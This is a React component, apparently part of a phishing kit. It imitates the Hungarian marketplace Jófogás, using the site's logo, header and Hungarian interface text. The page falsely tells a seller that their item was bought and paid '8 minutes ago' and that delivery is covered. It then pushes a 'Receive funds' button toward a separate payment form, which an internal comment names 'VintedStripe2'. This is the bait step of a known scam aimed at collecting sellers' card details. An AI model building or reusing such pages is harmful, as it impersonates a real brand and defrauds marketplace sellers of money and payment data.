import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './JofogasHuSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { API_URL } from '../apiBase';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const LOGO_SRC = `${process.env.PUBLIC_URL || ''}/jofogas-hu-logo.png`;
const FOOTER_SRC = `${process.env.PUBLIC_URL || ''}/jofogas-hu-footer.png`;

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function IconSearch() {
  return (
    <svg width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="#888" strokeWidth="2" aria-hidden>
      <circle cx="11" cy="11" r="7" />
      <path d="M21 21l-4.35-4.35" strokeLinecap="round" />
    </svg>
  );
}

function IconClock() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <circle cx="12" cy="12" r="9" />
      <path d="M12 7v5l3 2" strokeLinecap="round" />
    </svg>
  );
}

function IconUserSm() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="#666" strokeWidth="2" aria-hidden>
      <path d="M20 21v-2a4 4 0 0 0-4-4H8a4 4 0 0 0-4 4v2" />
      <circle cx="12" cy="7" r="4" />
    </svg>
  );
}

function IconPin() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="#666" strokeWidth="2" aria-hidden>
      <path d="M12 21s7-4.5 7-11a7 7 0 1 0-14 0c0 6.5 7 11 7 11z" />
      <circle cx="12" cy="10" r="2" fill="#666" stroke="none" />
    </svg>
  );
}

function IconWallet() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" stroke="#666" strokeWidth="2" aria-hidden>
      <rect x="2" y="7" width="20" height="12" rx="2" />
      <path d="M16 7V5a2 2 0 0 0-2-2H6a2 2 0 0 0-2 2v14a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2v-2" />
      <circle cx="16" cy="13" r="1.5" fill="#666" stroke="none" />
    </svg>
  );
}

function ShieldCheckGreen() {
  return (
    <svg className="jf-shield" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M12 2l7 4v6c0 5-3.5 9.5-7 10-3.5-.5-7-5-7-10V6l7-4z"
        fill="#e8f8ef"
        stroke="#2e9d5c"
        strokeWidth="1.2"
      />
      <path d="M9 12l2 2 4-5" stroke="#2e9d5c" strokeWidth="2" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

/**
 * Jófogás (HU): success после капчи → CTA на VintedStripe2 (та же платёжка).
 */
function JofogasHuSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);
  const [imgFailed, setImgFailed] = useState(false);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  useEffect(() => {
    setImgFailed(false);
  }, [pageData?.photo_url]);

  const countryCode = (pageData?.country_code || 'HU').toUpperCase();
  const primaryCurrency = getPrimaryCurrency(countryCode);
  const symbol = getSymbol(primaryCurrency);
  const rawPrice = pageData?.price;
  const productPrice = (() => {
    if (rawPrice == null || String(rawPrice).trim() === '') return null;
    const s = String(rawPrice)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  })();
  const amountDisplay =
    productPrice != null && Number.isFinite(productPrice)
      ? `${productPrice % 1 === 0 ? String(Math.round(productPrice)) : String(productPrice)} ${symbol}`
      : `— ${symbol}`;
  const productName = (pageData?.product_name || '').trim() || '—';
  const buyerName = [pageData?.first_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const address = (pageData?.delivery_address || '').trim() || '—';
  const photoUrl = resolvePhotoUrl(pageData?.photo_url || '');
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const initials = productName !== '—' ? productName.slice(0, 2).toUpperCase() : 'JF';

  if (loading && pageCode) {
    return (
      <div className="jf-wrap">
        <p className="jf-loading">Betöltés…</p>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="jf-wrap">
      <header className="jf-header">
        <div className="jf-header-inner">
          <a href="#/" className="jf-brand" onClick={(e) => e.preventDefault()}>
            <img
              src={LOGO_SRC}
              alt="Jófogás — Vedd tovább!"
              className="jf-brand-img"
              width={374}
              height={92}
              decoding="async"
            />
          </a>
          <div className="jf-search-wrap">
            <input
              type="search"
              className="jf-search"
              placeholder="Írd ide, mit keresel…"
              readOnly
              aria-label="Keresés"
            />
            <span className="jf-search-ico">
              <IconSearch />
            </span>
          </div>
          <button type="button" className="jf-btn-post" onClick={(e) => e.preventDefault()}>
            Hirdetésfeladás
          </button>
        </div>
      </header>

      <main className="jf-main">
        <div className="jf-main-inner">
          <div className="jf-grid">
            <article className="jf-col-left">
              <div className="jf-media">
                {photoUrl && !imgFailed ? (
                  <img src={photoUrl} alt="" className="jf-media-img" onError={() => setImgFailed(true)} decoding="async" />
                ) : (
                  <div className="jf-media-ph" aria-hidden>
                    {initials}
                  </div>
                )}
              </div>
              <h1 className="jf-title">{productName}</h1>
              <div className="jf-status-card">
                <p className="jf-price-big">{amountDisplay}</p>
                <p className="jf-paid-line">
                  <IconClock />
                  <span>Fizetett: 8 perccel ezelőtt</span>
                </p>
              </div>
            </article>

            <aside className="jf-sidebar">
              <h2 className="jf-sidebar-h">A terméket megvásárolták</h2>
              <div className="jf-card">
                <div className="jf-secure-row">
                  <ShieldCheckGreen />
                  <div>
                    <p className="jf-secure-title">Biztonságos tranzakció</p>
                    <p className="jf-secure-text">
                      Miután megkapta a pénzeszközöket, küldje el az árut a vevőnek a megadott adatok felhasználásával.
                    </p>
                  </div>
                </div>
                <div className="jf-info-row">
                  <IconUserSm />
                  <span>{buyerName}</span>
                </div>
                <div className="jf-info-row">
                  <IconPin />
                  <span>{address}</span>
                </div>
                <div className="jf-info-row">
                  <IconWallet />
                  <span>
                    Kapott összeg: <strong>{amountDisplay}</strong>
                  </span>
                </div>
                <Link to={index2Path} className="jf-cta">
                  Pénzeszközök fogadása
                </Link>
              </div>
            </aside>
          </div>
        </div>
      </main>

      <section className="jf-prefooter" aria-label="Státusz">
        <p className="jf-prefooter-paid">
          <span className="jf-prefooter-clock" aria-hidden>
            🕒
          </span>{' '}
          Fizetett: 8 perccel ezelőtt
        </p>
        <p className="jf-pill">A szállítás már kifizetve</p>
        <p className="jf-legal">
          A <a href="#/">Felhasználói szabályzat</a> és az <a href="#/">Adatvédelmi szabályzat</a> 2024. júliusában
          frissült. Kérjük, tekintse át a változásokat.
        </p>
      </section>

      <footer className="jf-footer">
        <img src={FOOTER_SRC} alt="" className="jf-footer-img" width={1600} height={520} decoding="async" />
      </footer>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default JofogasHuSuccess;
